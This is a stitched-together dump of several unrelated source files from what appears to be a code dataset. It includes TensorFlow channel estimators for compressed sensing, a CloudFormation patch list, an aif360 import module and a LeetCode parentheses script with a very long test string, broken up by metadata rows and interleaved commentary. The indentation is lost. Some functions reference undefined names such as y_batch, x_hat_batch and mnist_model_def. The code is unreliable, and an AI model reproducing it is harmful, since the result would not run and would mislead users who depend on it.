mask_bpc = torch.zeros((batch_size, seq_length, len_alfa+1), device=log2_scores.device)
for elem_batch in range(elements):
mask_bpc[elem_batch, torch.arange(seq_length), targets[elem_batch, :]] = -1.0
# compute bpc for each element in the batch
bpc = torch.sum(torch.sum(torch.sum(torch.mul(log2_scores, mask_bpc[:,:,:-1]), 2), 1)).item()
if divide_result:
return bpc / elements
else:
return bpc, elements
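`bits_per_character` above sums, over every predicted position, the negative base-2 log-probability the model assigned to the true symbol. A minimal pure-Python sketch of that definition (toy probabilities, no torch; names are illustrative):

```python
import math

def bpc_sum(probs, targets):
    """Sum of -log2 p(target) over positions; probs is a list of probability vectors."""
    return sum(-math.log2(p[t]) for p, t in zip(probs, targets))

# A uniform model over 4 symbols costs exactly 2 bits per character.
uniform = [[0.25] * 4] * 3
print(bpc_sum(uniform, [0, 1, 2]) / 3)  # → 2.0
```

The tensor version in `bits_per_character` computes the same quantity in one batched multiply against a -1 one-hot mask instead of indexing per position.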
# csgm/src/channel_estimators.py
"""Estimators for compressed sensing"""
# pylint: disable = C0301, C0103, C0111, R0914
from sklearn.linear_model import OrthogonalMatchingPursuit
import numpy as np
import tensorflow as tf
import channel_model_def
from mnist_utils import save_image
import utils
def lasso_estimator(hparams): # pylint: disable = W0613
"""LASSO estimator"""
def estimator(A_val, y_batch_val, hparams):
x_hat_batch = []
for i in range(hparams.batch_size):
y_val = y_batch_val[i]
x_hat = utils.solve_lasso(A_val, y_val, hparams)
x_hat = np.maximum(np.minimum(x_hat, 1), 0)
x_hat_batch.append(x_hat)
x_hat_batch = np.asarray(x_hat_batch)
return x_hat_batch
return estimator
def omp_estimator(hparams):
"""OMP estimator"""
omp_est = OrthogonalMatchingPursuit(n_nonzero_coefs=hparams.omp_k)
def estimator(A_val, y_batch_val, hparams):
x_hat_batch = []
for i in range(hparams.batch_size):
y_val = y_batch_val[i]
omp_est.fit(A_val.T, y_val.reshape(hparams.num_measurements))
x_hat = omp_est.coef_
x_hat = np.reshape(x_hat, [-1])
x_hat = np.maximum(np.minimum(x_hat, 1), 0)
x_hat_batch.append(x_hat)
x_hat_batch = np.asarray(x_hat_batch)
return x_hat_batch
return estimator
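The OMP estimator above delegates to scikit-learn, but its core greedy step is simple: at each iteration, select the dictionary atom most correlated with the current residual. A pure-Python sketch of that selection step (toy atoms; names are illustrative, not part of the original code):

```python
def best_atom(atoms, residual):
    """Index of the atom with the largest absolute inner product with the residual."""
    score = lambda a: abs(sum(x * r for x, r in zip(a, residual)))
    return max(range(len(atoms)), key=lambda i: score(atoms[i]))

atoms = [[1.0, 0.0], [0.0, 1.0], [0.6, 0.8]]
print(best_atom(atoms, [0.6, 0.8]))  # → 2, the atom aligned with the residual
```

Full OMP then solves a least-squares problem over all selected atoms and updates the residual, which is what `OrthogonalMatchingPursuit` handles internally.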
def pggan_estimator(hparams):
# pylint: disable = C0326
# Get a session
sess = tf.Session()
# Set up placeholders
Tx = tf.placeholder(tf.float32, shape=hparams.modSignal_shape, name='Tx')
Rx = tf.placeholder(tf.float32, shape=hparams.modSignal_shape, name='Rx')
Pilot = tf.placeholder(tf.float32, shape=[hparams.batch_size, hparams.pilot_dim], name='Pilot')
# Create the generator
z_batch = tf.Variable(tf.random.normal([hparams.batch_size, hparams.z_dim]), name='z_batch')
H_hat, restore_dict_gen, restore_path_gen = channel_model_def.pggan_gen(z_batch, Pilot, hparams)
# measure the estimate
print('H_hat:',H_hat.shape)
print('Tx:',Tx.shape)
Rx_hat = utils.calRx(H_hat,Tx,hparams)
'''
if hparams.measurement_type == 'project':
y_hat_batch = tf.identity(x_hat_batch, name='y2_batch')
elif hparams.measurement_type == 'pilot':
Rx_hat = utils.calRx(H_hat,Tx,hparams)
# Rx_hat = utils.multiComplex(H_hat,Tx);
# Rx_hat = tf.multiply(H_hat, Tx, name='y_hat') # TODO complex mult
else:
measurement_is_sparse = (hparams.measurement_type in ['inpaint', 'superres'])
y_hat_batch = tf.matmul(x_hat_batch, A, b_is_sparse=measurement_is_sparse, name='y2_batch')
'''
# define all losses
if hparams.measurement_type == 'pilot':
# only pilot loss
m_loss1_batch = tf.abs(utils.get_tf_pilot(Rx) - utils.get_tf_pilot(Rx_hat))
m_loss2_batch = (utils.get_tf_pilot(Rx) - utils.get_tf_pilot(Rx_hat))**2
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
else:
m_loss1_batch = tf.reduce_mean(tf.abs(Rx - Rx_hat), 1)
m_loss2_batch = tf.reduce_mean((Rx - Rx_hat)**2, 1)
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
# define total loss
total_loss_batch = hparams.mloss1_weight * m_loss1_batch \
+ hparams.mloss2_weight * m_loss2_batch \
+ hparams.zprior_weight * zp_loss_batch
total_loss = tf.reduce_mean(total_loss_batch)
# Compute means for logging
m_loss1 = tf.reduce_mean(m_loss1_batch)
m_loss2 = tf.reduce_mean(m_loss2_batch)
zp_loss = tf.reduce_mean(zp_loss_batch)
# Set up gradient descent
var_list = [z_batch]
global_step = tf.Variable(0, trainable=False, name='global_step')
learning_rate = utils.get_learning_rate(global_step, hparams)
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
opt = utils.get_optimizer(learning_rate, hparams)
update_op = opt.minimize(total_loss, var_list=var_list, global_step=global_step, name='update_op')
opt_reinit_op = utils.get_opt_reinit_op(opt, var_list, global_step)
# Initialize and restore model parameters
init_op = tf.global_variables_initializer()
sess.run(init_op)
restorer_gen = tf.train.Saver(var_list=restore_dict_gen)
restorer_gen.restore(sess, restore_path_gen)
def estimator(Tx_val, Rx_val, Pilot_val, hparams):
"""Function that returns the estimated image"""
best_keeper = utils.BestKeeper(hparams)
# NOTE: the original 'project' branch referenced undefined placeholders, so
# only the pilot measurement path is supported here.
feed_dict = {Tx: Tx_val, Rx: Rx_val, Pilot: Pilot_val}
for i in range(hparams.num_random_restarts):
sess.run(opt_reinit_op)
for j in range(hparams.max_update_iter):
if hparams.gif and ((j % hparams.gif_iter) == 0):
images = sess.run(H_hat, feed_dict=feed_dict)
for im_num, image in enumerate(images):
save_dir = '{0}/{1}/'.format(hparams.gif_dir, im_num)
utils.set_up_dir(save_dir)
save_path = save_dir + '{0}.png'.format(j)
image = image.reshape(hparams.image_shape)
save_image(image, save_path)
_, lr_val, total_loss_val, \
m_loss1_val, \
m_loss2_val, \
zp_loss_val = sess.run([update_op, learning_rate, total_loss,
m_loss1,
m_loss2,
zp_loss], feed_dict=feed_dict)
logging_format = 'rr {} iter {} lr {} total_loss {} m_loss1 {} m_loss2 {} zp_loss {}'
print(logging_format.format(i, j, lr_val, total_loss_val,
m_loss1_val,
m_loss2_val,
zp_loss_val))
H_hat_val, total_loss_val = sess.run([H_hat, total_loss], feed_dict=feed_dict)
best_keeper.report(H_hat_val, total_loss_val)
return best_keeper.get_best()
return estimator
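`pggan_estimator` restarts the latent optimization from several random initializations and keeps the reconstruction with the lowest loss (via `utils.BestKeeper`). The pattern, stripped of TensorFlow (function names here are illustrative, not from the original code):

```python
def best_of_restarts(run_once, n_restarts):
    """run_once() -> (estimate, loss); return the pair with the lowest loss."""
    best = None
    for _ in range(n_restarts):
        candidate = run_once()
        if best is None or candidate[1] < best[1]:
            best = candidate
    return best

runs = iter([("a", 3.0), ("b", 1.0), ("c", 2.0)])
print(best_of_restarts(lambda: next(runs), 3))  # → ('b', 1.0)
```

Random restarts hedge against the non-convex latent-space loss: each restart draws a fresh `z`, and only the best optimum is reported.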
def dcgan_estimator(hparams):
# pylint: disable = C0326
# Get a session
sess = tf.Session()
# Set up placeholders
Tx = tf.placeholder(tf.float32, shape=hparams.modSignal_shape, name='Tx')
Rx = tf.placeholder(tf.float32, shape=hparams.modSignal_shape, name='Rx')
Pilot = tf.placeholder(tf.float32, shape=[hparams.batch_size, hparams.pilot_dim], name='Pilot')
# Create the generator
z_batch = tf.Variable(tf.random.uniform([hparams.batch_size, hparams.z_dim]), name='z_batch')
H_hat, restore_dict_gen, restore_path_gen = channel_model_def.dcgan_gen(z_batch, Pilot, hparams)
# Create the discriminator
#prob, restore_dict_discrim, restore_path_discrim = channel_model_def.dcgan_discrim(H_hat, Pilot, hparams)
# measure the estimate
Rx_hat = utils.calRx(H_hat, Tx, hparams)
'''
if hparams.measurement_type == 'project':
y_hat_batch = tf.identity(x_hat_batch, name='y2_batch')
elif hparams.measurement_type == 'pilot':
Rx_hat = utils.calRx(H_hat,Tx,hparams)
# Rx_hat = utils.multiComplex(H_hat,Tx);
# Rx_hat = tf.multiply(H_hat, Tx, name='y_hat') # TODO complex mult
else:
measurement_is_sparse = (hparams.measurement_type in ['inpaint', 'superres'])
y_hat_batch = tf.matmul(x_hat_batch, A, b_is_sparse=measurement_is_sparse, name='y2_batch')
'''
# define all losses
if hparams.measurement_type == 'pilot':
# pilot loss only
m_loss1_batch = tf.abs(utils.get_tf_pilot(Rx) - utils.get_tf_pilot(Rx_hat))
m_loss2_batch = (utils.get_tf_pilot(Rx) - utils.get_tf_pilot(Rx_hat))**2
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
#d_loss1_batch = -tf.log(prob)
#d_loss2_batch = tf.log(1-prob)
else:
m_loss1_batch = tf.reduce_mean(tf.abs(Rx - Rx_hat), 1)
m_loss2_batch = tf.reduce_mean((Rx - Rx_hat)**2, 1)
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
#d_loss1_batch = -tf.log(prob)
#d_loss2_batch = tf.log(1-prob)
# define total loss
total_loss_batch = hparams.mloss1_weight * m_loss1_batch \
+ hparams.mloss2_weight * m_loss2_batch \
+ hparams.zprior_weight * zp_loss_batch
total_loss = tf.reduce_mean(total_loss_batch)
# Compute means for logging
m_loss1 = tf.reduce_mean(m_loss1_batch)
m_loss2 = tf.reduce_mean(m_loss2_batch)
zp_loss = tf.reduce_mean(zp_loss_batch)
#d_loss1 = tf.reduce_mean(d_loss1_batch)
#d_loss2 = tf.reduce_mean(d_loss2_batch)
# Set up gradient descent
var_list = [z_batch]
global_step = tf.Variable(0, trainable=False, name='global_step')
learning_rate = utils.get_learning_rate(global_step, hparams)
with tf.variable_scope(tf.get_variable_scope(), reuse=False):
opt = utils.get_optimizer(learning_rate, hparams)
update_op = opt.minimize(total_loss, var_list=var_list, global_step=global_step, name='update_op')
opt_reinit_op = utils.get_opt_reinit_op(opt, var_list, global_step)
# Initialize and restore model parameters
init_op = tf.global_variables_initializer()
sess.run(init_op)
restorer_gen = tf.train.Saver(var_list=restore_dict_gen)
#restorer_discrim = tf.train.Saver(var_list=restore_dict_discrim)
restorer_gen.restore(sess, restore_path_gen)
#restorer_discrim.restore(sess, restore_path_discrim)
def estimator(Tx_val, Rx_val, Pilot_val, hparams):
"""Function that returns the estimated image"""
best_keeper = utils.BestKeeper(hparams)
if hparams.measurement_type == 'project':
feed_dict = {y_batch: y_batch_val}
else:
feed_dict = {Tx: Tx_val, Rx: Rx_val, Pilot: Pilot_val}
for i in range(hparams.num_random_restarts):
sess.run(opt_reinit_op)
for j in range(hparams.max_update_iter):
if hparams.gif and ((j % hparams.gif_iter) == 0):
images = sess.run(x_hat_batch, feed_dict=feed_dict)
for im_num, image in enumerate(images):
save_dir = '{0}/{1}/'.format(hparams.gif_dir, im_num)
utils.set_up_dir(save_dir)
save_path = save_dir + '{0}.png'.format(j)
image = image.reshape(hparams.image_shape)
save_image(image, save_path)
_, lr_val, total_loss_val, \
m_loss1_val, \
m_loss2_val, \
zp_loss_val = sess.run([update_op, learning_rate, total_loss,
m_loss1,
m_loss2,
zp_loss], feed_dict=feed_dict)
logging_format = 'rr {} iter {} lr {} total_loss {} m_loss1 {} m_loss2 {} zp_loss {}'
print(logging_format.format(i, j, lr_val, total_loss_val, m_loss1_val, m_loss2_val, zp_loss_val))
H_hat_val, total_loss_val = sess.run([H_hat, total_loss], feed_dict=feed_dict)
best_keeper.report(H_hat_val, total_loss_val)
return best_keeper.get_best()
return estimator
def vae_estimator(hparams):
# Get a session
sess = tf.Session()
# Set up placeholders
Tx = tf.placeholder(tf.float32, shape=hparams.image_shape, name='Tx')
Rx = tf.placeholder(tf.float32, shape=hparams.image_shape, name='Rx')
# Create the generator
# TODO: Move z_batch definition here
z_batch, H_hat, restore_path, restore_dict = channel_model_def.vae_gen(hparams)
# measure the estimate
if hparams.measurement_type == 'project':
Rx_hat = tf.identity(x_hat_batch, name='y_hat_batch')
elif hparams.measurement_type == 'pilot':
Rx_hat = utils.multiComplex(H_hat, Tx)
# Rx_hat = tf.multiply(H_hat, Tx, name='y_hat') # TODO complex mult
else:
Rx_hat = tf.multiply(H_hat, Tx, name='y_hat')
# define all losses
m_loss1_batch = tf.reduce_mean(tf.reduce_mean(tf.abs(Rx - Rx_hat), 1),0)
m_loss2_batch = tf.reduce_mean(tf.reduce_mean((Rx - Rx_hat)**2, 1),0)
zp_loss_batch = tf.reduce_sum(z_batch**2, 1)
# define total loss
total_loss_batch = hparams.mloss1_weight * m_loss1_batch \
+ hparams.mloss2_weight * m_loss2_batch \
+ hparams.zprior_weight * zp_loss_batch
total_loss = tf.reduce_mean(total_loss_batch)
# Compute means for logging
m_loss1 = tf.reduce_mean(m_loss1_batch)
m_loss2 = tf.reduce_mean(m_loss2_batch)
zp_loss = tf.reduce_mean(zp_loss_batch)
# Set up gradient descent
var_list = [z_batch]
global_step = tf.Variable(0, trainable=False, name='global_step')
learning_rate = utils.get_learning_rate(global_step, hparams)
opt = utils.get_optimizer(learning_rate, hparams)
update_op = opt.minimize(total_loss, var_list=var_list, global_step=global_step, name='update_op')
opt_reinit_op = utils.get_opt_reinit_op(opt, var_list, global_step)
# Initialize and restore model parameters
init_op = tf.global_variables_initializer()
sess.run(init_op)
restorer = tf.train.Saver(var_list=restore_dict)
restorer.restore(sess, restore_path)
def estimator(Tx_val, Rx_val, hparams):
"""Function that returns the estimated image"""
best_keeper = utils.BestKeeper(hparams)
if hparams.measurement_type == 'project':
feed_dict = {Rx: Rx_val}
else:
feed_dict = {Tx: Tx_val, Rx: Rx_val}
for i in range(hparams.num_random_restarts):
sess.run(opt_reinit_op)
for j in range(hparams.max_update_iter):
_, lr_val, total_loss_val, \
m_loss1_val, \
m_loss2_val, \
zp_loss_val = sess.run([update_op, learning_rate, total_loss,
m_loss1,
m_loss2,
zp_loss], feed_dict=feed_dict)
logging_format = 'rr {} iter {} lr {} total_loss {} m_loss1 {} m_loss2 {} zp_loss {}'
print(logging_format.format(i, j, lr_val, total_loss_val, m_loss1_val, m_loss2_val, zp_loss_val))
H_hat_val, total_loss_batch_val = sess.run([H_hat, total_loss_batch], feed_dict=feed_dict)
best_keeper.report(H_hat_val, total_loss_batch_val)
return best_keeper.get_best()
return estimator
def learned_estimator(hparams):
sess = tf.Session()
y_batch, x_hat_batch, restore_dict = mnist_model_def.end_to_end(hparams)
restore_path = utils.get_A_restore_path(hparams)
# Initialize and restore model parameters
restorer = tf.train.Saver(var_list=restore_dict)
restorer.restore(sess, restore_path)
def estimator(A_val, y_batch_val, hparams): # pylint: disable = W0613
"""Function that returns the estimated image"""
x_hat_batch_val = sess.run(x_hat_batch, feed_dict={y_batch: y_batch_val})
return x_hat_batch_val
return estimator
| 42.540984 | 110 | 0.629094 | 2,146 | 15,570 | 4.217614 | 0.093663 | 0.035797 | 0.029168 | 0.016573 | 0.880124 | 0.860568 | 0.852613 | 0.829853 | 0.825323 | 0.811623 | 0 | 0.014026 | 0.271933 | 15,570 | 365 | 111 | 42.657534 | 0.784404 | 0.087283 | 0 | 0.824034 | 0 | 0 | 0.03057 | 0 | 0 | 0 | 0 | 0.008219 | 0 | 0 | null | null | 0 | 0.025751 | null | null | 0.021459 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
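The estimators above all minimize the same objective over the latent `z_batch`: a weighted L1 measurement error, a weighted L2 measurement error, and an L2 prior on z. A framework-free NumPy sketch of that per-batch loss (a hypothetical standalone version; the originals build it from TensorFlow ops and the `hparams` weights):

```python
import numpy as np

def total_loss(Rx, Rx_hat, z, w1, w2, wz):
    """Mirror of the TF objective: w1*mean|Rx-Rx_hat| + w2*mean((Rx-Rx_hat)^2)
    + wz*sum(z^2) per example, averaged over the batch (axis 0)."""
    Rx, Rx_hat, z = (np.asarray(a, dtype=float) for a in (Rx, Rx_hat, z))
    m_loss1 = np.mean(np.abs(Rx - Rx_hat), axis=1)   # per-example L1 error
    m_loss2 = np.mean((Rx - Rx_hat) ** 2, axis=1)    # per-example L2 error
    zp_loss = np.sum(z ** 2, axis=1)                 # z-prior penalty
    return float(np.mean(w1 * m_loss1 + w2 * m_loss2 + wz * zp_loss))

# With a perfect fit and z at the origin the loss is zero:
print(total_loss([[1., 2.]], [[1., 2.]], [[0., 0.]], 1.0, 1.0, 0.001))  # 0.0
```

The gradient-descent loop then only has to drive this scalar down with respect to z, which is exactly why `var_list = [z_batch]` is the sole optimization variable.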
3c6c6c62a18a70a305e80f9a1970d2b4079c209b | 286 | py | Python | scripts/patches/fis.py | CptnDuras/troposphere | 1bf912f9cf149ec111154679f53ee9ec92556555 | [
"BSD-2-Clause"
] | null | null | null | scripts/patches/fis.py | CptnDuras/troposphere | 1bf912f9cf149ec111154679f53ee9ec92556555 | [
"BSD-2-Clause"
] | null | null | null | scripts/patches/fis.py | CptnDuras/troposphere | 1bf912f9cf149ec111154679f53ee9ec92556555 | [
"BSD-2-Clause"
] | null | null | null | patches = [
{
"op": "add",
"path": "/ResourceTypes/AWS::FIS::ExperimentTemplate/Properties/Tags/PrimitiveType",
"value": "Map",
},
{
"op": "remove",
"path": "/ResourceTypes/AWS::FIS::ExperimentTemplate/Properties/Tags/Type",
},
]
| 23.833333 | 92 | 0.541958 | 23 | 286 | 6.73913 | 0.652174 | 0.219355 | 0.258065 | 0.296774 | 0.709677 | 0.709677 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0.258741 | 286 | 11 | 93 | 26 | 0.731132 | 0 | 0 | 0 | 0 | 0 | 0.58042 | 0.479021 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
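The `patches` list above uses RFC 6902 (JSON Patch) conventions to adjust the CloudFormation resource specification. A minimal stdlib-only sketch of applying the `add`/`remove` subset to a hypothetical spec dict (real code would use the `jsonpatch` package):

```python
def apply_patches(doc, patches):
    """Apply a JSON-Patch-style list of 'add'/'remove' ops to nested dicts.
    Illustration-only subset; paths are plain '/'-separated keys."""
    for patch in patches:
        *parents, leaf = patch["path"].lstrip("/").split("/")
        target = doc
        for key in parents:
            target = target[key]   # walk down to the parent container
        if patch["op"] == "add":
            target[leaf] = patch["value"]
        elif patch["op"] == "remove":
            del target[leaf]
        else:
            raise ValueError("unsupported op: %s" % patch["op"])
    return doc

spec = {"ResourceTypes": {"AWS::FIS::ExperimentTemplate": {
    "Properties": {"Tags": {"Type": "Json"}}}}}
patches = [
    {"op": "add",
     "path": "/ResourceTypes/AWS::FIS::ExperimentTemplate/Properties/Tags/PrimitiveType",
     "value": "Map"},
    {"op": "remove",
     "path": "/ResourceTypes/AWS::FIS::ExperimentTemplate/Properties/Tags/Type"},
]
tags = apply_patches(spec, patches)["ResourceTypes"]["AWS::FIS::ExperimentTemplate"]["Properties"]["Tags"]
print(tags)  # {'PrimitiveType': 'Map'}
```

The net effect of the patch pair is to retype the `Tags` property from a structured `Type` to a primitive `Map`.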
3c823bc2c848fefbdb1ab8c091406d8fa8f4715d | 96 | py | Python | aif360/detectors/__init__.py | IBM/AIF-360 | 9eae52000c92bbc9279f8ee4bdb7a7c5ac585359 | [
"Apache-2.0"
] | 982 | 2018-09-12T17:19:11.000Z | 2020-07-13T21:26:24.000Z | aif360/detectors/__init__.py | IBM/AIF-360 | 9eae52000c92bbc9279f8ee4bdb7a7c5ac585359 | [
"Apache-2.0"
] | 109 | 2018-09-12T20:39:43.000Z | 2020-07-09T20:12:00.000Z | aif360/detectors/__init__.py | IBM/AIF-360 | 9eae52000c92bbc9279f8ee4bdb7a7c5ac585359 | [
"Apache-2.0"
] | 335 | 2018-09-13T15:35:09.000Z | 2020-07-06T10:56:12.000Z | from aif360.detectors.mdss.MDSS import MDSS
from aif360.detectors.mdss_detector import bias_scan | 48 | 52 | 0.875 | 15 | 96 | 5.466667 | 0.533333 | 0.243902 | 0.463415 | 0.560976 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067416 | 0.072917 | 96 | 2 | 52 | 48 | 0.853933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b1e9ae815e493dea089d5decb6cba4744e113efb | 13,091 | py | Python | s32.py | glcrazier/LeetCodePlay | cf951a079d458e02000d170529cb1e3b049da023 | [
"MIT"
] | 1 | 2018-02-20T13:56:02.000Z | 2018-02-20T13:56:02.000Z | s32.py | glcrazier/LeetCodePlay | cf951a079d458e02000d170529cb1e3b049da023 | [
"MIT"
] | null | null | null | s32.py | glcrazier/LeetCodePlay | cf951a079d458e02000d170529cb1e3b049da023 | [
"MIT"
] | null | null | null | from solution import Solution
if __name__ == '__main__':
sol = Solution()
print(sol.longestValidParentheses("("))
print(sol.longestValidParentheses("(()"))
print(sol.longestValidParentheses("(()()"))
print(sol.longestValidParentheses("())())"))
print(sol.longestValidParentheses("(()())"))
print(sol.longestValidParentheses("()(())"))
print(sol.longestValidParentheses("()(()"))
print(sol.longestValidParentheses("()(()(()"))
print(sol.longestValidParentheses("((()))())"))
print(sol.longestValidParentheses(")(((((()())()()))()(()))("))
print sol.longestValidParentheses("((())))()())))(((()()(())))((()(())()((()))())())())()())))))))(((()(())(()))(()()(()()((()))()(())(()(())))))()(())(()()(((()(()()))))((()()))))))()((()())()()))((())()((((()))()()()((()())))())((())))))))(()()((((((()))(((((((()()))((())()(()())()()()(()())(()())(())))()()))))()(((())(())(()())()))()(()))(())((()))))(())))()))((()((()(())(()()()()()))(())())()))))()(()(((())))()()()(((()((()))(()((((((())((()))(()(())(()))(())())))()()))))())(()((()()())()))((((()(()))()()))(()())))((()))(()((((()(())(())()((()))(()))())))(((()(())))((())()(()(((())))())())()()()())((()()))))))(()))(())()(((()))()()((()))(()))(((()))))))))(()(())())(()((())(()()))((())))(()())((((())))(()(()))())(((()(()((()(())((())())(()))(())))()()(())((()()))((()()((()()())())()))())()))())()))())(()(()))(()))()(())))((((())()())()()())((()())(()())(()()))()(())(())))))()()()((()(())(((()(())()()))(()()((()(((()))))))))(((()((()()((()(((((())((()((()((((((((())()))())((())((()((()(()((())(((()(()))())))))))))))))()((()(())())))()(()))(((()))())()(((()))))((()(())(()())(((()(((()((((())()))))(())((()(((((()((()(()()()()((()((((((((((((())()(()))()()(()())()(()(((()((()(()()()())))((())()))())()()))())(((()(())))))()()()(((())))((()(()(((())(())(()((((()(((()(())(((((())()))())())()()(()())((((()(())))((()())))))))))()(()(())))))))()))()())))((())(()()()()()()()(())(()())))))())((()()))))()))))((())((()(((()))))(((()()))()(()((()()())()))(((()(()((())(()(()(()()))()((()(())))()((())))))(())()(())()))((())(((((()))()())(())))((((()((())())(())))(())))))((())())())((((()((())))()()((()()()))()())())(()())(((()))()()))))(()(())(()))()())(()())(()))(((((((()(()))())()())()())((()(((((()())(((())))()())))(()(()(())()((())()))(())))())()))((((()))())((()))(())))))(()))))))(()))))(())))())()()())()()(())()()(((((()))(((()()))()(()((((()(()(()(())))())))())(()()())()(()))())(()()))(()()((()()))))))(())((()()))(())))())())(())((((()))))()))()))()()()))))((((()((())(()))
(()()))(())()())(()())))(()(()(())((()())()((())(()))()))()))))((())))(())(()))()()()()()))((())(((()(())))(((((((()(()))(()))())()((()))(()(())((()((()((())))()()((())))))((((())()())(()()(((()()((()))()()((())))(((()())((((()(())())))())()()()(())()))))))()()((()))())(()(((()()))((())))())())())((((()(((()(())())()())((()((()(()((())()(()))()((())))()(()))))(((()))())())(()((()))))()()(((((()))())))(()(()(())((((())())))((()()())(((((((()(()(()))(())))))()))(()(((((())()))((()()()()((()))()(()()()()))(()))))())())()))()(()()(((())((()))(()())))((()()(((())())))))))(())))((()(()(((())((((()))))(()()()))))(((((((())(()(()))(()(())((())(()(()(()(()())(())()(())(()()(()(()))())(())()()(((()())(())(()(((()()(())()((((()()))())(((()(((((()())()(())))()))))(()(()()(()(()()(((()))()))((()())))()(()(())))))))())((((()()))(()))))()((()))(()))())()))()))))(()(())()()()))(((((()))()())())(()())())))()())))))()()()())))))(())(((()))((())((()()))))()((((()(()(()))))(()(())(((())(()()(((()(())()())(()()(()(()())))()())))(((()()((()())()()((()))()))(((()((((()(((()(((()(()())((()))))()(()())(())()(()(((())((()))(())()(())()(()(())()))())()))()())(()))))()))))((()()()((()(()()(())))())(())()(()()))))))))()((()))((((())))())))((()()()(()(()((((()((()))()()((())((())(()))))(())())(((()()(()))))))(()()))()))((()(()(())()))(((())()))(())(()((((()((()()()))()()))(()()(())())((((((())(())((()())()(()())))()))())(()()(()(()()()(()()()()))(()(()()())())((()()()(((()((()())()()((()()(()((()())()())()((()))(()((()())))))))(())((((())(((((())(((())(()))(((()((()()())()((()(()))()()()(()((((())))(())())))((())))(()(((((()()()((())((((((((()()((((())))())())())))))))(((()())(((()))())))()))((())())())))))))))(()()(((())))))(())()()))((())()))(()(()))((()(()((((()(()(((()))))()))(()(()))())())()()(((())())(((()))))(((()())))()(()())()())()))())())(()()(((()()))(())(((()((())((((())))))((()))))(()((()(())))()(())((()(())((()(()())())))()))))(())())(()())()()()((())))((()()))()()()((((()())))))()
))))()))())()((()(())()()(())(((()((()))(()(()()))(()))()))))))))))))(()()))(((())((()(((()()()(()())((((()(()()()))())))())(()())))(()((((()))((()()())(((()))()())(()(()((()(()))))(())()()((()())((()(()(()))((()((()())(((()(((((()()()))(()()(()(((()(()())()()()))((()(()())))())(()(()))(())()())))()()()))()())(()(((((()))()()((((()()()()))()()(()((()))(()))))))))))()))()(()((((((())(()))()((())))(((((())))))(()))))()()(()()()(((((()))()())()((((()()))()(())())))(((()((())))))))))(()()()((()))(()())((())))()()((()())))()()(()))))))))()(((()(()))()())((((((())))(((()(()())())))(())())())()()((((()(()(((())(()()(((((()))(()(())()))))))()))()())))()()(()))(((()))()())))((())(((()()))((((((())))(((())()()(()((()))())(()((()()(((())())()))()()())())(()()((((((((())))()(((())(()))))()()())()(())))(((((()())(((())()()))))()((())())(())()(()(()()((()))()(()(((()))))()()())(())()()()(((()((()()()(()())())(())()(((((()())(())()((((()()()))()((())()((()(()(((()(()))()())())()())()(()()(()(((()))()(())(()())(())((())()((()()())(()))))()(()()))))((())()()((()((()()(()((()()())(())))))())))()))))(((((()(()())(()))((()))()(()())())())))()(()()(()((())))))()()))((())((((()))))())((()))())((())((()(()((()))()()()))()((((((())((((((()((((((((()))(()(((()(((((((((())(())())()())))))))())())))()))(()))))()(()))(())))()()()((()()))(())(()))(()()(()())))()(()()()()())))(())((((()))(((((())(()(((((())((()((((()))(((((()))(()())()))))())()))()(()()))((((()))()())(())))()((())))(((((()()((()()((()))))()((())())()))(((((((((()((())((((())()())))(())())()))())))())()))()(()()(()))(()()()((())((()))())))()(()())()(((((((()))))(()()()((()(())))())()))((())())(()(()(())()()())))))(()()()))())()))()())(((())(())))()(())())))()((()(()(())()()()((()))()))((())((((()((((((()()()))()))())())))))()(())(()())))()(((()())(((())))((())()()))((())())()()(()()())()))())(((()((()(((()())(()(())(((())))()))))))())()((((((()))))))()(()))()))())))())((((())(())()(())()))()))((((((((()()(())())((((())))((((()(()
)()()(())()))())()))(((()((()))()(((((()()()))))(()(()())))(((()(((()(())())((((())(()((()((()(()()(()()))()))()()))()))))))())()(())())))(((())))((()))((()(())())((())))((()))()))(((()))))(()())()())())()())))())))(())))(())())()((()())()()))((()()())(((((()())))())))()()()((((((())())()((())()))(()))()(()())()())(())()())((()((())(())()()()()((())(()())()()((())))()(((()(()(((((()(())))()(()))()(()))()))())()))()())()(()))))()()())(((())((()((())(()(()))()((()))))))(())(()(())())()()((())((())((((())))))(()()())(()()())(())())(((()()(())(())))()()))(())))))())(())()(((())())))((()(((())))(()((())()))()))((()()())()(((((())((((())))(())()()((()()(()()))(()((()))((())())))))))()())))())())((()(()()()()()))))()))((())(((((()())(()))((())))((()(())))))))))(((())(()(())(()(())((()((()))()((())())()())()((()(())())()(((()()((()(()())))))())((())(((()())(((()(()((())((()(((())(()()((((((()))())))())(()(()(()()())())((()))((())(())(())())))()(()())()))())(())((((())()((())))))(()()((())(((((()))()()))()()())(()(((()))())()()()))(((()()))(()(()((())(())))()()((((()()))()(())()())()()()()()(()()))(((())(((()()()((((((((((()()()(((()))))))())))()(((((((()((((((((()))()(((())())())())((((((()()))(()))()))))(())()())))())(()))(((())()()()((()()((())(()))((()(()())))()(()((()((())()()()()(())()()((())())())()()))()()))))((()()((())(((())(())())))((()